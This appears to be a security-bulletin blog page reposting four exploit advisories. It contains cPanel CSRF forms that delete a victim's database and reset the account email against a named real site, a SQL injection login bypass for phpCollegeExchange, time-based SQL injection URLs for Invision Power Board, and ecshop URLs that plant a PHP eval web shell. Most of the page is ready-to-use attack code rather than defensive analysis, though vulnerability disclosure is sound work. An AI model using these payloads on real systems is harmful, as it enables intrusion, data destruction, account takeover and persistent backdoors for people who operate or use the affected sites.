GO IT WORLD | IT TECH | IT NEWS

goitworld.com

Sep 14

cPanel < 11.30.2 Multiple CSRF Vulnerabilities

By jason Security Bulletin No Comments »

Test Code:

[+] Info=======================================================

[-] Exploit Title: cPanel < 11.30.2 Multiple CSRF Vulnerabilities
[-] Author: Net.Edit0r
[-] Home : Black-HG.Org ~ h4ckcity.org
[-] Version: 11.30.2
[-] Software Link: http://cpanel.net
[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
[-] Date : 27/08/2011
[-] CVE : N/A
[-] Vedio Demo : http://www.black-hg.org/Vedioz/cpanel.rar
[-] Tnx2 : A.Cr0x & 3H34N & 4m!n & Cyrus & tHe.k!ll3r & Mr.XHat & Mikili

[+] Exploit=====================================================

[-] Introduction :

cPanel versions below and excluding 11.30.2 , are vulnerable to CSRF which
leads to Change email address script of the attackers liking. If you have turned
off security tokens and referrer security check, no matter what version you
are using, you are vulnerable as well.

Note: You can use this vulnerability to do intelligent

[-] Remote Delete Database

<html>
<head>
<body>
<title>Coded By #BHG</title>
<form method="post"
action=https://www.downloadpars.ir:2083/cpsess1461226313/frontend/x3/sql
/deldb.html
name="mainform" id="mainform">
        <h4>Delete Database</h4>
        <div class="highlight">
        <table cellpadding="3" cellspacing="0">
    <tr>
        <td><label for="dbname">Victim Database:</label></td>
        <td><input type="text" name="db" id="dbname" style="width: 150px" /></td>
        </tr>
    <td> </td>
                <td><center><input type="submit" id="submit_dbname"
value="Delete Database" class="input-button" /></center></td>
                <body onload="document.forms.g.submit();">
    <td></td>
        </tr>
        </table>
        </div>
    </form>
</div>
</body>
</html>

[-] Remote Change Cpanel Mail

<html>
<head>
<body>
<title>Coded By #BHG</title>
<form id="mainform" name="mainform"
action=https://www.downloadpars.ir:2083/cpsess8033607818/frontend/x3/contact/
saveemail.html?email=>
<ul class="contact_form">

        <li class="contact_label">Chenge New Email Address</li>
        <li class="contact_input brd"><input id="email" name="email"
type="text" checked="checked" value="net.edit0r@gmail.com" size="40"
/></li>
        <li class="contact_label">The second address to receive
notifications</li>
        <li class="contact_input brd"><input id="second_email"
name="second_email" type="text" checked="checked" value="" size="40"
/></li>

        <li><strong>Contact Preferences</strong></li>

        <li class="contact_input"><input id="notify_disk_limit"
name="notify_disk_limit" type="checkbox" checked="checked" value="1"
size="40" />Send notifications to your contact email address when you
are reaching your disk quota.</li>

        <li class="contact_input"><input id="notify_bandwidth_limit"
name="notify_bandwidth_limit" type="checkbox" checked="checked"
value="1" size="40" />Send notifications to your contact email address
when you are reaching your bandwidth usage limit.</li>

        <li class="contact_input"><input id="notify_email_quota_limit"
name="notify_email_quota_limit" type="checkbox" checked="checked"
value="1" size="40" />Send notifications to your contact email address
when one of your email accounts approaches or is over quota.</li>

    <input style="margin-top:10px" type="submit" id="submit-button"
class="input-button" value="Save"></div></li>

</ul>
<br />

</form>
</div>
</body>
</html>

Tagged with: cpanel • csrf • Vulnerabilities

Dec 13

phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities

By jason Security Bulletin 6 Comments »

Name phpCollegeExchange
Vendor http://phpcollegeex.sourceforge.net
Versions Affected 0.1.5c

Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2009-12-11

X. INDEX

I.    ABOUT THE APPLICATION
II.   DESCRIPTION
III. ANALYSIS
IV.   SAMPLE CODE
V.    FIX
VI.   DISCLOSURE TIMELINE

I. ABOUT THE APPLICATION

PhpCollegeExchange is a full fledged college community
website.

II. DESCRIPTION

This application is affected by many SQL Injection
security flaws. In order to exploit they, the Magic Quotes
GPG (php.ini) must be Off.
In this security advisory I reported only some of the
vulnerable files.
I tested 0.1.5c version only, however other versions may
be also vulnerable.

III. ANALYSIS

Summary:

A) Authentication Bypass
B) Multiple SQL Injection

A) Authentication Bypass

Using a SQL Injection in the login process, a guest can
bypass the authentication.
In order to exploit it, The Magic Quotes GPG flag must be
Off.

Vulnerable code (functions.php):

……..

function checkpass($handle,$pass){
require_once($home."mysqlinfo.php");
include("i_aeskey.php");
$query="SELECT AES_DECRYPT(password,’$AES_key’) FROM users WHERE
(handle=’$handle’)";
$result = mysql_query($query);

if(mysql_num_rows($result))
{
    if($r = mysql_fetch_array($result))
     {$dbpass=$r[0];}
     if($pass==$dbpass)
        {return 1;}

……..

B) Multiple SQL Injection

Searchend.php is affected by multiple SQL injection issues
that allow a guest to view reserved information stored
into the database.
The following is an example of vulnerable code found in
searchend.php.

Vulnerable code (searchend.php):

……..

$query = "SELECT * FROM Books";

if(isset($_POST['searchby'])){$searchby=$_POST['searchby'];}else{$searchby=$_GET['searchby'];}

switch($searchby){
……..

case "Title" :

$title = $_POST['searchquery'];
if(strlen($title)>2){
//check length at least 3 chars

$query .= " WHERE (title LIKE ‘%$title%’) ORDER BY price";
$result = mysql_query($query);

……..

Another funny SQL injection may be seen in forgotpass.php.
It can be manipulate to send to an arbitrary email address
the password of a registered user, knowing the AES key.

Vulnerable code:

……..

if( isset($_POST["handle"]) ){

……..

$query="SELECT AES_DECRYPT(password,’$AES_key’), email FROM users
WHERE (handle=’$handle’)";
$result = mysql_query($query);

if(mysql_num_rows($result)){

$r = mysql_fetch_array($result);

$email = $r[1];
$pass = $r[0];

……..

mail("$email", "Your Book Exchange Password", $emailcontent);

……..

IV. SAMPLE CODE

A) Authentication Bypass

Username: -1′) UNION ALL SELECT ‘foo’#
Password: foo

B) Multiple SQL Injection

A proof of concept can be found here:
http://poc.salvatorefresta.net/PoC-phpCollegeExchange.txt

V. FIX

No fix.

VIII. DISCLOSURE TIMELINE

2009-12-11 Bug discovered
2009-12-11 Initial vendor contact
2009-12-11 Advisory Release

Tagged with: phpcollegeexchange • sql injection • Vulnerabilities

Dec 06

Invision Power Board SQL Injection Vulnerabilities

By jason Security Bulletin 9 Comments »

Version:

Invision Power Services Invision Power Board 2.3.6
Invision Power Services Invision Power Board 3.0.4

Description:

The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Test

http://www.example.com/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&s
tarter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20–%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd

http://www.example.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR
%20substr(version(),1,1)=5%20AND%20sleep(16)%20–%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c

Tagged with: invision • power board • sql injection • Vulnerabilities

May 30

ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities

By jason Security Bulletin No Comments »

This is a discussion on “ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities” within the Public part of the Exploits section; Feel free to discuss about this proof-of-concept code Download: exploit…

 ######################### Securitylab.ir ########################
# Application Info:
# Name: ecshop
# Version: 2.6.2
# Website: http://www.ecshop.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: info@securitylab[dot]ir & K4mr4n_st@yahoo.com
#################################################################
#===========================================================
# :: integrate.php ::
#
# if ($_REQUEST['act'] == 'sync')
# {
# $size = 100;
# ......
# $tasks = array();
# if ($task_del > 0)
# {
# $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'<span id="task_del">' . $_LANG['task_uncomplete'] . '<span>');
# $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";
# $del_list = $db->getCol($sql);//$del_list
# }
# if ($task_rename > 0)
# {
# $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'<span id="task_rename">' . $_LANG['task_uncomplete'] . '</span>');
# $sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";
# $rename_list = $db->getAll($sql);//$rename_list
# }
# if ($task_ignore >0)
# {
# $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";
# $ignore_list = $db->getCol($sql);//$ignore_list
# }
# ....
# $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');
# $log = '';
# if (isset($del_list))
# {
# $log .= '$del_list=' . var_export($del_list,true) . ';';
# }
# if (isset($rename_list))
# {
# $log .= '$rename_list=' . var_export($rename_list, true) . ';';
# }
# if (isset($ignore_list))
# {
# $log .= '$ignore_list=' . var_export($ignore_list, true) . ';';
# }
# fwrite($fp, $log);
# fclose($fp);
# $smarty->assign('tasks', $tasks);
# $smarty->assign('ur_here',$_LANG['user_sync']);
# $smarty->assign('size', $size);
# $smarty->display('integrates_sync.htm');
# }
#
#
# http://site.com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

Tagged with: ecshop • Vulnerabilities

GO IT WORLD | IT TECH | IT NEWS

cPanel < 11.30.2 Multiple CSRF Vulnerabilities

phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities

Invision Power Board SQL Injection Vulnerabilities

ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities

Categories

Tag Cloud

Archives

Links

Meta